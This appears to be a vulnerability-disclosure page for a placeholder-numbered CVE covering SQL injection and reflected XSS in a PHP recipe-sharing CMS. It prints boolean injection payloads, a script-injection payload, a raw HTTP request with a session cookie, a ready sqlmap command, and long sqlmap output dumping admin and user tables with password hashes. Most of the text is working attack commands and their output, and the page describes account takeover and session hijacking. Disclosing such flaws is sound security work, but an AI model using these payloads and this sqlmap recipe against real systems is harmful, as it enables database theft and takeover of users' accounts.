Attacker Value
Very High
CVE-nu11-17-092921
Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
CVE-nu11-17-092921
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Defense Evasion
Techniques
Validation
Execution
Techniques
Validation
Description
MySQL Vulnerability Description:
The cid parameter appears on Recipe Sharing Website – CMS (by:oretnom23) to be vulnerable to SQL injection attacks. The payloads 12345678’ or ‘7775’=‘7775 and 77335599’ or ‘5533’=‘5577 were each submitted in the cid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker can dump information about users and their passwords. Then he can take control of their accounts.
XSS Vulnerability Description:
The value of the page request parameter on Recipe Sharing Website – CMS (by:oretnom23) is copied into the HTML document as text between TITLE tags. The payload n0gg2</title><script>alert(1)</script>pfcjm was submitted in the page parameter. This input was echoed unmodified in the application’s response. The attacker can take control of some of the accounts by using the PHPSESSID Hijacking method attack.
Add Assessment
1
Technical Analysis
CVE-nu11-17-092921
Vendor
MySQL Vulnerability Description:
The cid parameter appears on Recipe Sharing Website – CMS (by:oretnom23) to be vulnerable to SQL injection attacks. The payloads 12345678’ or ‘7775’=‘7775 and 77335599’ or ‘5533’=‘5577 were each submitted in the cid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The attacker can dump information about users and their passwords. Then he can take control of their accounts.
- MySQL Request:
GET /recipe_site/?page=recipe&cid=12345678'%20or%20'7775'%3d'7775 HTTP/1.1 Host: 192.168.1.180 Cookie: PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.180/recipe_site/ Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Connection: close Cache-Control: max-age=0
- MySQL Response:
HTTP/1.1 200 OK Date: Wed, 29 Sep 2021 07:50:44 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22 X-Powered-By: PHP/7.4.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13306 <br /> <b>Warning</b>: SQLite3::exec(): database is locked in <b>C:\xampp\htdocs\recipe_site\DBConnection.php</b> on line <b>76</b><br /> <br /> <b>Warning</b>: SQLite3::exec(): database is locked i ...[SNIP]... <div class="item col wow bounceInUp"> ...[SNIP]... <div class="card shadow-sm "> ...[SNIP]... <div class="card-body "> ...[SNIP]... <h5 class="card-title mb-1">Sample Recipe 102</h5> ...[SNIP]... <hr class="bg-primary opacity-100"> ...[SNIP]... <p class="truncate-3 fw-light fst-italic lh-1" title="Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Etiam hendrerit tellus in nisi semper vulputate. Curabitur accumsan metus sit amet erat volutpat, pl ...[SNIP]... <div class="w-100 d-flex justify-content-end"> ...[SNIP]... <div class="col-auto flex-grow-1"> ...[SNIP]... <div class="text-muted truncate-1" title="Claire Blake"> ...[SNIP]... <div class="col-auto"> ...[SNIP]... <a href="./?page=view_recipe&rid=2" class="btn btn-sm btn-primary bg-gradient rounded-0 py-0">View Recipes</a> ...[SNIP]... <div class="item col wow bounceInUp"> ...[SNIP]... <div class="card shadow-sm "> ...[SNIP]... <div class="card-body "> ...[SNIP]... <h5 class="card-title mb-1">Sample Menu</h5> ...[SNIP]... <hr class="bg-primary opacity-100"> ...[SNIP]... <p class="truncate-3 fw-light fst-italic lh-1" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus at odio. Proin elementum convallis leo at ...[SNIP]... <div class="w-100 d-flex justify-content-end"> ...[SNIP]... <div class="col-auto flex-grow-1"> ...[SNIP]... <div class="text-muted truncate-1" title="Try My Recipe Mgt"> ...[SNIP]... <div class="col-auto"> ...[SNIP]... <a href="./?page=view_recipe&rid=1" class="btn btn-sm btn-primary bg-gradient rounded-0 py-0">View Recipes</a> ...[SNIP]...
- The PoC:
python sqlmap.py -u "http://192.168.1.180/recipe_site/?page=view_recipe&rid=2" --data="username=PWNED&password=password" --cookie="PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd" --batch --answers="crack=N,dict=N,continue=Y,quit=N" --dump
- Output from the PoC:
--- Parameter: rid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=view_recipe&rid=2' AND 8223=8223 AND 'szHe'='szHe Type: time-based blind Title: SQLite > 2.0 AND time-based blind (heavy query) Payload: page=view_recipe&rid=2' AND 9766=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'pxtJ'='pxtJ Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: page=view_recipe&rid=-3970' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113,107,120,113,113)||CHAR(98,110,109,97,65,108,113,65,99,90,118,79,112,72,99,89,87,70,75,70,68,116,65,117,97,65,106,79,101,100,109,86,65,79,84,109,79,82,112,77)||CHAR(113,113,118,106,113),NULL,NULL,NULL,NULL-- Lafs --- [15:54:52] [INFO] the back-end DBMS is SQLite web application technology: PHP 7.4.22, Apache 2.4.48 back-end DBMS: SQLite [15:54:52] [INFO] fetching tables for database: 'SQLite_masterdb' [15:54:52] [INFO] fetching columns for table 'admin_list' [15:54:52] [INFO] fetching entries for table 'admin_list' [15:54:52] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] N Database: <current> Table: admin_list [2 entries] +----------+------+--------+---------------+----------------------------------+-----------+---------------------+ | admin_id | type | status | fullname | password | username | date_created | +----------+------+--------+---------------+----------------------------------+-----------+---------------------+ | 1 | 1 | 1 | Administrator | 0192023a7bbd73250516f069df18b500 | admin | 2021-09-28 01:54:24 | | 2 | 2 | 1 | Mike Williams | a88df23ac492e6e2782df6586a0c645f | mwilliams | 2021-09-28 08:00:51 | +----------+------+--------+---------------+----------------------------------+-----------+---------------------+ [15:54:52] [INFO] table 'SQLite_masterdb.admin_list' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\admin_list.csv' [15:54:52] [INFO] fetching columns for table 'comment_list' [15:54:52] [INFO] fetching entries for table 'comment_list' [15:54:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [15:54:52] [INFO] fetching number of entries for table 'comment_list' in database 'SQLite_masterdb' [15:54:52] [INFO] resumed: 4 [15:54:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [15:54:52] [INFO] retrieved: [15:54:52] [WARNING] time-based comparison requires larger statistical model, please wait..................... (done) [15:54:53] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [15:54:53] [INFO] resumed: 1 [15:54:53] [INFO] resumed: 2021-09-28 05:58:39 [15:54:53] [INFO] resumed: This is only a sample comment 101 [15:54:53] [INFO] resumed: 1 [15:54:53] [INFO] resumed: 1 [15:54:53] [INFO] retrieved: [15:54:53] [INFO] retrieved: [15:54:53] [INFO] resumed: 3 [15:54:53] [INFO] resumed: 2021-09-28 06:26:59 [15:54:53] [INFO] resumed: Sample Comment 102 [15:54:53] [INFO] resumed: 1 [15:54:53] [INFO] resumed: 1 [15:54:53] [INFO] retrieved: [15:54:53] [INFO] retrieved: [15:54:53] [INFO] resumed: 6 [15:54:53] [INFO] resumed: 2021-09-28 07:32:49 [15:54:53] [INFO] resumed: Test User Comment 101 [15:54:53] [INFO] resumed: 2 [15:54:53] [INFO] resumed: 3 [15:54:53] [INFO] retrieved: [15:54:53] [INFO] retrieved: [15:54:53] [INFO] resumed: 7 [15:54:53] [INFO] resumed: 2021-09-28 07:34:03 [15:54:53] [INFO] resumed: test [15:54:53] [INFO] resumed: 2 [15:54:53] [INFO] resumed: 1 Database: <current> Table: comment_list [4 entries] +---------+-----------+------------+---------+-----------------------------------+---------------------+ | user_id | recipe_id | comment_id | FOREIGN | message | date_created | +---------+-----------+------------+---------+-----------------------------------+---------------------+ | 1 | 1 | 1 | <blank> | This is only a sample comment 101 | 2021-09-28 05:58:39 | | 1 | 1 | 3 | <blank> | Sample Comment 102 | 2021-09-28 06:26:59 | | 3 | 2 | 6 | <blank> | Test User Comment 101 | 2021-09-28 07:32:49 | | 1 | 2 | 7 | <blank> | test | 2021-09-28 07:34:03 | +---------+-----------+------------+---------+-----------------------------------+---------------------+ [15:54:53] [INFO] table 'SQLite_masterdb.comment_list' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\comment_list.csv' [15:54:53] [INFO] fetching columns for table 'recipe_list' [15:54:53] [INFO] fetching entries for table 'recipe_list' [15:54:53] [INFO] fetching number of entries for table 'recipe_list' in database 'SQLite_masterdb' [15:54:53] [INFO] resumed: 2 [15:54:53] [INFO] retrieved: [15:54:53] [INFO] retrieved: [15:54:53] [INFO] resumed: 4 [15:54:53] [INFO] resumed: 2021-09-28 03:14:26 [15:54:53] [INFO] resumed: <p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus at odio. Proin elementum convallis leo at lacinia. Donec in libero vitae nunc consequat vehicula ac et sem. Nulla ac lacus vitae augue porta congue at vitae ante. Suspendisse pulvinar eget nibh bibendum aliquam. Nulla rutrum sit amet mi et facilisis. Donec et odio augue. Cras elementum at sapien at suscipit. Nam sodales, velit nec congue mollis, ligula neque blandit eros, ac porta nibh lorem vel lacus.</span><br></p> [15:54:53] [INFO] resumed: <ul><li>sample</li><li>Test</li><li>ingredient 1</li><li>ingredient 2</li><li>ingredient 3</li><li>ingredient 4</li><li>ingredient 5</li><li>ingredient 6<br></li></ul> [15:54:53] [INFO] resumed: <p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Aliquam nec sodales arcu. Integer posuere, eros ut imperdiet lacinia, orci mi sodales augue, eget pretium dolor nisi varius lorem. In metus diam, venenatis nec metus et, posuere mollis mauris.</span></p><p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;"><b>Nutrition Facts</b></span></p><ul><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 101 5%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 102 20%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 103 25%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 104 25%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 105 5%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 106 5%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 107 15%</span></li></ul> [15:54:53] [INFO] resumed: 1 [15:54:53] [INFO] resumed: 1 [15:54:53] [INFO] resumed: <ol><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Quisque ac euismod sem.</span></li><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Cras aliquet dolor id lacinia pretium. Curabitur vitae dictum urna, sed viverra nisl. Aenean non finibus lacus. Pellentesque at ex ut augue pulvinar vestibulum at eu nibh.</span></li><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Curabitur semper, elit sit amet consectetur suscipit, dui felis vulputate elit, eu lacinia tellus lorem in nunc. Pellentesque ac neque enim.</span></li><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Maecenas at bibendum mauris, eu cursus enim. Vestibulum a efficitur velit, sit amet tincidunt tellus. Nam hendrerit justo metus, ac eleifend mauris egestas vitae.</span></li><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Aliquam nec sodales arcu. Integer posuere, eros ut imperdiet lacinia, orci mi sodales augue, eget pretium dolor nisi varius lorem. In metus diam, venenatis nec metus et, posuere mollis mauris. Sed sodales nibh iaculis velit dignissim ultrices.<br></span><br></li></ol> [15:54:53] [INFO] resumed: Sample Menu [15:54:53] [INFO] resumed: 1 [15:54:53] [INFO] retrieved: [15:54:53] [INFO] retrieved: [15:54:53] [INFO] resumed: 3 [15:54:53] [INFO] resumed: 2021-09-28 07:24:03 [15:54:53] [INFO] resumed: <p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Etiam hendrerit tellus in nisi semper vulputate. Curabitur accumsan metus sit amet erat volutpat, placerat laoreet lorem tempus. Aenean eget convallis nisi. Duis id nisl ut urna fermentum commodo. Cras quis nulla lacus. Etiam et nulla non risus hendrerit tincidunt. Vestibulum efficitur odio in nibh ultrices laoreet.</span><br></p> [15:54:53] [INFO] resumed: <ul><li>Test 1</li><li>Test 2</li><li>Test 3</li><li>Test 4</li><li>Test 5</li><li>Test 6<br></li></ul> [15:54:53] [INFO] resumed: <p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Integer ut quam congue, posuere ante vitae, vestibulum orci. Integer accumsan erat sed sagittis commodo. Nullam vulputate, libero quis venenatis vestibulum, ex enim pellentesque purus, quis gravida lectus tellus id justo. Integer elementum a lacus a vehicula. Sed sed purus a massa tincidunt mattis at non ligula.&nbsp;</span><br></p> [15:54:53] [INFO] resumed: 2 [15:54:53] [INFO] resumed: 1 [15:54:53] [INFO] resumed: <ol><li><span style=\\\\\\"font-family: \\"Open Sans\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\">Maecenas aliquet nunc vitae risus condimentum accumsan. In blandit, sapien vitae tristique viverra, tortor est pretium quam, eget ultricies metus ipsum eget turpis.</span></li><li><span style=\\\\\\"font-family: \\"Open Sans\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\">Morbi vitae hendrerit elit. Nulla ullamcorper dapibus ipsum sit amet convallis. Vestibulum ullamcorper mollis risus a ullamcorper. </span></li><li><span style=\\\\\\"font-family: \\"Open Sans\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\">Sed consectetur mauris metus, sed interdum purus pretium gravida. Phasellus pulvinar fringilla fringilla. Lorem ipsum dolor sit amet, consectetur adipiscing elit.</span></li><li><span style=\\\\\\"font-family: \\"Open Sans\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\">Quisque vel sem dapibus, congue felis sit amet, sollicitudin odio. Vestibulum rhoncus semper diam quis aliquam. <br></span><br></li></ol> [15:54:53] [INFO] resumed: Sample Recipe 102 [15:54:53] [INFO] resumed: 3 Database: <current> Table: recipe_list [2 entries] +---------+-----------+-------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------+--------+---------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+ | user_id | recipe_id | category_id | step | title | status | FOREIGN | other_info | description | ingredients | date_created | +---------+-----------+-------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------+--------+---------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+ | 1 | 1 | 4 | <ol><li><span style=\\\\\\\"font-family: \\\"Open Sans\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\">Quisque ac euismod sem.</span></li><li><span style=\\\\\\\"font-family: \\\"Open Sans\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\">Cras aliquet dolor id lacinia pretium. Curabitur vitae dictum urna, sed viverra nisl. Aenean non finibus lacus. Pellentesque at ex ut augue pulvinar vestibulum at eu nibh.</span></li><li><span style=\\\\\\\"font-family: \\\"Open Sans\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\">Curabitur semper, elit sit amet consectetur suscipit, dui felis vulputate elit, eu lacinia tellus lorem in nunc. Pellentesque ac neque enim.</span></li><li><span style=\\\\\\\"font-family: \\\"Open Sans\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\">Maecenas at bibendum mauris, eu cursus enim. Vestibulum a efficitur velit, sit amet tincidunt tellus. Nam hendrerit justo metus, ac eleifend mauris egestas vitae.</span></li><li><span style=\\\\\\\"font-family: \\\"Open Sans\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\">Aliquam nec sodales arcu. Integer posuere, eros ut imperdiet lacinia, orci mi sodales augue, eget pretium dolor nisi varius lorem. In metus diam, venenatis nec metus et, posuere mollis mauris. Sed sodales nibh iaculis velit dignissim ultrices.<br></span><br></li></ol> | Sample Menu | 1 | <blank> | <p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Aliquam nec sodales arcu. Integer posuere, eros ut imperdiet lacinia, orci mi sodales augue, eget pretium dolor nisi varius lorem. In metus diam, venenatis nec metus et, posuere mollis mauris.</span></p><p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;"><b>Nutrition Facts</b></span></p><ul><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 101 5%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 102 20%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 103 25%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 104 25%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 105 5%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 106 5%</span></li><li><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Sample 107 15%</span></li></ul> | <p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus at odio. Proin elementum convallis leo at lacinia. Donec in libero vitae nunc consequat vehicula ac et sem. Nulla ac lacus vitae augue porta congue at vitae ante. Suspendisse pulvinar eget nibh bibendum aliquam. Nulla rutrum sit amet mi et facilisis. Donec et odio augue. Cras elementum at sapien at suscipit. Nam sodales, velit nec congue mollis, ligula neque blandit eros, ac porta nibh lorem vel lacus.</span><br></p> | <ul><li>sample</li><li>Test</li><li>ingredient 1</li><li>ingredient 2</li><li>ingredient 3</li><li>ingredient 4</li><li>ingredient 5</li><li>ingredient 6<br></li></ul> | 2021-09-28 03:14:26 | | 3 | 2 | 3 | <ol><li><span style=\\\"font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\">Maecenas aliquet nunc vitae risus condimentum accumsan. In blandit, sapien vitae tristique viverra, tortor est pretium quam, eget ultricies metus ipsum eget turpis.</span></li><li><span style=\\\"font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\">Morbi vitae hendrerit elit. Nulla ullamcorper dapibus ipsum sit amet convallis. Vestibulum ullamcorper mollis risus a ullamcorper. </span></li><li><span style=\\\"font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\">Sed consectetur mauris metus, sed interdum purus pretium gravida. Phasellus pulvinar fringilla fringilla. Lorem ipsum dolor sit amet, consectetur adipiscing elit.</span></li><li><span style=\\\"font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\">Quisque vel sem dapibus, congue felis sit amet, sollicitudin odio. Vestibulum rhoncus semper diam quis aliquam. <br></span><br></li></ol> | Sample Recipe 102 | 1 | <blank> | <p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Integer ut quam congue, posuere ante vitae, vestibulum orci. Integer accumsan erat sed sagittis commodo. Nullam vulputate, libero quis venenatis vestibulum, ex enim pellentesque purus, quis gravida lectus tellus id justo. Integer elementum a lacus a vehicula. Sed sed purus a massa tincidunt mattis at non ligula.&nbsp;</span><br></p> | <p><span style="font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px; text-align: justify;">Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Etiam hendrerit tellus in nisi semper vulputate. Curabitur accumsan metus sit amet erat volutpat, placerat laoreet lorem tempus. Aenean eget convallis nisi. Duis id nisl ut urna fermentum commodo. Cras quis nulla lacus. Etiam et nulla non risus hendrerit tincidunt. Vestibulum efficitur odio in nibh ultrices laoreet.</span><br></p> | <ul><li>Test 1</li><li>Test 2</li><li>Test 3</li><li>Test 4</li><li>Test 5</li><li>Test 6<br></li></ul> | 2021-09-28 07:24:03 | +---------+-----------+-------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------+--------+---------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+ [15:54:53] [INFO] table 'SQLite_masterdb.recipe_list' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\recipe_list.csv' [15:54:53] [INFO] fetching columns for table 'user_list' [15:54:53] [INFO] fetching entries for table 'user_list' [15:54:53] [INFO] recognized possible password hashes in column 'password' do you want to crack them via a dictionary-based attack? [Y/n/q] N Database: <current> Table: user_list [3 entries] +---------+--------+-------------------+----------------------------------+----------+---------------------+ | user_id | status | fullname | password | username | date_created | +---------+--------+-------------------+----------------------------------+----------+---------------------+ | 1 | 1 | Try My Recipe Mgt | 48280ea386fb6ce4e66d199fcf14b333 | mgt | 2021-09-28 02:42:29 | | 3 | 1 | Claire Blake | 4744ddea876b11dcb1d169fadf494418 | cblake | 2021-09-28 07:02:50 | | 4 | 1 | John Smith | 39ce7e2a8573b41ce73b5ba41617f8f7 | jsmith | 2021-09-28 07:59:40 | +---------+--------+-------------------+----------------------------------+----------+---------------------+ [15:54:53] [INFO] table 'SQLite_masterdb.user_list' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\user_list.csv' [15:54:53] [INFO] fetching columns for table 'category_list' [15:54:53] [INFO] fetching entries for table 'category_list' Database: <current> Table: category_list [4 entries] +-------------+---------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | category_id | name | description | +-------------+---------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | 1 | Vegies | Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus at odio. Proin elementum convallis leo at lacinia. Donec in libero vitae nunc consequat vehicula ac et sem. Nulla ac lacus vitae augue porta congue at vitae ante. Suspendisse pulvinar eget nibh bibendum aliquam. Nulla rutrum sit amet mi et facilisis. Donec et odio augue. Cras elementum at sapien at suscipit. Nam sodales, velit nec congue mollis, ligula neque blandit eros, ac porta nibh lorem vel lacus. | | 2 | Porks | Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus at odio. Proin elementum convallis leo at lacinia. Donec in libero vitae nunc consequat vehicula ac et sem. Nulla ac lacus vitae augue porta congue at vitae ante. Suspendisse pulvinar eget nibh bibendum aliquam. Nulla rutrum sit amet mi et facilisis. Donec et odio augue. Cras elementum at sapien at suscipit. Nam sodales, velit nec congue mollis, ligula neque blandit eros, ac porta nibh lorem vel lacus. | | 3 | Beef | In vehicula risus iaculis, placerat dolor a, accumsan elit. Phasellus vel sem in tellus maximus rutrum commodo non libero. Sed tincidunt libero elit, in commodo libero pulvinar lacinia. | | 4 | Chicken | In vehicula risus iaculis, placerat dolor a, accumsan elit. Phasellus vel sem in tellus maximus rutrum commodo non libero. Sed tincidunt libero elit, in commodo libero pulvinar lacinia. | +-------------+---------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ [15:54:53] [INFO] table 'SQLite_masterdb.category_list' dumped to CSV file 